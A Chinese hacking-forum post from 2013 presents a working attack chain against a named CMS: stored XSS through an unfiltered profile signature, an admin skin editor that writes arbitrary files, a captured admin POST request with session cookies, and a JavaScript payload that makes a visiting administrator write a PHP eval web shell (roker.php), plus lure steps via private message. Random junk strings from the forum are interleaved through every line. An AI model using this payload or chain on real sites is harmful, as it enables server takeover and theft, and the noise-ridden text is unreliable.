|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题- n9 ~) R7 H% e K- H8 o0 S" {
官网已经修补了,所以重新下了源码
0 x$ g. T8 i. F% v$ n1 O因为 后台登入 还需要认证码 所以 注入就没看了。
" K+ n; B' t6 H. w! w% e5 ]* \存在 xss6 ^/ m( B& \ M5 \
漏洞文件 user/member/skin_edit.php
+ r; L7 z+ U+ m4 N. P& r. w本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:! m2 c3 t4 E: S& S8 n$ J9 L8 S
( q9 A2 R3 V; T! g# a</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>+ w/ A0 ~7 A/ E }$ H3 X
* y# U6 P& Q! O/ R) \% v2 }/ b) k0 I
</textarea></td></tr>
: w6 G6 m4 f+ J! ~- u7 ?" V
8 W8 ], w3 g2 ]; h. z user/do.php 3 o3 b8 g0 l E7 N4 P
' W3 y/ [ V- ?7 g" e; ~
( F$ z1 E) w# I% G. r5 Q5 ~if($op=='zl'){ //资料; N& X8 x! Y' m7 |. a
3 i! l1 E' L0 J6 n9 n) g3 k if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) w0 a4 O0 X8 k9 ?1 Q" t
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
; @ b7 w7 J, W' M2 v$ c0 Q , ]) r# Q4 V ^! a2 k) K
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."'," U0 Q) {+ U" p3 G. C7 u
+ ~- b* i( P# t7 M8 {6 x1 J
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
- w: d0 p/ P- Q( s1 l! D3 ~- J where CS_Name='".$cscms_name."'";: c' b$ v3 N* W( t m: [2 F
' D" w- l( Q9 Y: J+ }
if($db->query($sql)){
% I/ A3 d i. m2 d0 B! x, k1 q: o
3 a% ?' |! @$ r+ b" I9 C9 S9 d8 r7 j exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
# }4 c. x# _: N2 [! E
# M3 g4 Q% ?' [/ ?- v1 b% w i" C* r }else{) J# Z/ M' C1 m
* G% @) v+ O5 c4 |% c3 @& R exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
$ c7 H; a# ]0 z3 v6 u* h" z9 n 9 {* } R5 R8 L
}
* w, M3 r0 b' O, q7 T- j! r
9 c% c7 Y* n& k! |
) l9 z6 R5 q. ^8 ^, ~( X# W没有 过滤导致xss产生。
: E$ B0 I |+ {后台 看了下 很奇葩的是可以写任意格式文件。。
8 q% w# T* I! h$ D6 \3 k3 l抓包。。8 A% s' W ]/ a7 @4 s
R0 S2 O7 X3 P. L: j
; E) L: ^9 Q# [3 X: b8 D! q本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
2 T- c5 o: a; f% g7 x: F7 Z* Z Q) j& Z" [$ u/ C- I
Accept: text/html, application/xhtml+xml, */*
! A4 o; c3 O+ p+ X& L
7 I; l$ p2 ~+ S7 M* k% ZReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php) l# b2 }: S) g' I
! r2 p0 l, Z' W, K" t+ n7 q
Accept-Language: zh-CN
5 g1 @0 V4 ]* }: }7 h/ S / |8 n j# A# A( }, D4 k$ D% C
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
# @+ O2 Z; X! F6 |
6 Y# {0 @: Y+ [Content-Type: application/x-www-form-urlencoded
# S' u1 V2 B. q5 n# ~8 A5 u* a
0 I: j% o( s& C( N1 J( r+ bAccept-Encoding: gzip, deflate
7 `* s' }! u, H" B% z4 J) S% z
# r9 L+ }4 H' }& l# }. sHost: 127.0.0.1) Y6 [0 {4 g, F, q0 ]* E# H9 f
- w, I1 M. d# g( L9 kContent-Length: 38
. z; E% F$ T- m! D; }
0 c, T7 S/ T- I6 S) I- y8 cDNT: 1
& ]6 Z. V W- W& H5 @' y l( M7 x" t
; Y4 j+ U0 A* j* |8 t {Connection: Keep-Alive
3 V5 k7 \$ o( Z: n$ Y. ]
4 }' N, f; W; a( s# d2 |Cache-Control: no-cache
" b. o; a/ C& k, y
; f# A# w1 B+ L& O3 g2 l9 UCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f655948 x' A8 ~3 v- _7 \
4 h, \8 e$ _8 z* {- U# } z0 p" ]& t8 d1 I* a" W) J
name=aaa.php&content=%3Cs%3E%3Ca%25%3E
( P/ e6 O( A! f8 ^( F/ R
% ]" J+ l( d& Q+ R' V9 t
( e6 L8 A$ d- c% {% `; M) @
$ z6 ^9 Q1 k) B! e于是 构造js如下。( _. z# K% p" s& T8 p
' c% R n& B1 m4 E' j X O
本帖隐藏的内容<script>
) o" |- v% }$ U4 k j' rthisTHost = top.location.hostname; |( P$ T* a5 H" F3 T
( @/ X' X7 J6 ~0 ~thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
5 _" S7 q3 b- x" `8 x1 j6 j; v
' A3 Z$ V$ i# k& f% Wfunction PostSubmit(url, data, msg) {
9 R" @& [5 H3 |, j! o var postUrl = url;
' @4 x" Z7 w3 z+ ], M& R
" ?8 V: }7 i! w; ^' b: d4 t var postData = data;
) w7 `, C, M" g, c' e% o; R, q, s var msgData = msg;
! b" E' P$ \0 E. |& z var ExportForm = document.createElement("FORM"); - o$ C9 f' I& Z* _. t% ~! u
document.body.appendChild(ExportForm); ! ?9 M. \; h; C+ E* t# B/ j; N4 ?
ExportForm.method = "POST";
5 g- G5 d1 o% S0 q6 T+ L4 l var newElement = document.createElement("input"); : P- z3 d6 o# M; V1 k
newElement.setAttribute("name", "name"); 7 @1 O9 @- ]& R9 b5 F
newElement.setAttribute("type", "hidden");
/ p' p$ S& H+ N) u$ K: C: N) f var newElement2 = document.createElement("input"); / }7 h; T% @# P9 @0 P
newElement2.setAttribute("name", "content");
8 j) C5 P+ u, D0 i newElement2.setAttribute("type", "hidden");
. x0 [2 m; m v+ O0 t, v+ \& Y ExportForm.appendChild(newElement);
" A6 u }0 j9 U) f( [ ExportForm.appendChild(newElement2); ; o' X' H: g$ i! A5 @8 C+ H, S
newElement.value = postData; ! j' Q/ C8 X8 r' S& U W
newElement2.value = msgData;
' v, M7 F3 X: N: C. C1 k. \7 h3 V ExportForm.action = postUrl; 8 |: v& A8 W* i1 i
ExportForm.submit(); , T0 \- r8 B; u7 K& d3 w( m/ G
};% G3 { }; P R9 O& D' ] L- R9 ?
: w: q' R6 M' D* \' T7 o3 lPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
/ Q2 n- Q& v: |& a5 p1 v. ?$ t + c6 D- k7 w8 ]! g
</script>9 u1 v4 m5 n) r* m/ e0 j8 G
) D! I1 J. @! ]; w- f/ v" a
5 L+ S2 K9 t1 o' _! }% o" P/ d3 G# i
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
% J* I6 Y) F0 A. N* D: R6 l用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)1 w% A4 r8 b5 R' z5 n7 f `! ?
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
8 l1 g5 A! c0 D
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对